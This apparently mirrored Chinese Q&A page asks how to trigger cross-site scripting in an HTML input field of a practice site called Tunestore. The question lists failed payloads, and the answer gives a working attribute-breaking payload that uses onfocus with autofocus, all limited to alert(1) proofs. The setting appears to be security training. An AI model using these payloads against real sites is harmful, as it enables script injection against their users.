javascript - 如何在 HTML 输入字段中启动 XSS 代码?
问题描述
我正在努力在一个假冒的网站上寻找漏洞,我想知道如何在这个输入字段中启动 XSS 代码?
- 这是来自网站的代码:
<form name="friendForm" method="POST" action="/Tunestore/addfriend.do">
Friend name: <input type="text" name="friend" value=""
<script>alert(1)</script>"><br>
<input type="submit" value="Submit">
</form>
我已经尝试过了,但没有奏效:
"> <script>alert(1)</script>
" onfocus="alert(1)"
" onclick="alert(1)
解决方案
尝试这个:
" onfocus="alert(1)" autofocus="
它将扩展为:
<'input type="text" name="friend" value=" " onfocus="alert(1)" autofocus=" " />
这将导致一个警告框,显示 XSS。
推荐阅读
- intellij-idea - IntelliJ IDEA 向 JAR 添加资源
- android - 模拟器:模拟器:错误:检测到挂起的线程“QEMU2 CPU0 线程”。15000 毫秒无响应
- r - 根据模式匹配创建指标变量
- c# - asp.net core 2.1, C# app, c# web service, 访问SQL数据库
- javascript - 使用 Yup 验证信用卡详细信息
- php - 在 wordpress 中显示有关特定错误消息的管理员通知
- javascript - 在 Laravel 中使用 javascript 创建控件
- javascript - 无法为 D3 分位数函数输出图例
- webpack-style-loader - Vue-cli import relative scss 不适用于供应商**外部**库**在样式文件中**
- angular - 在嵌套的 Angular formGroups 中动态分配 formControlName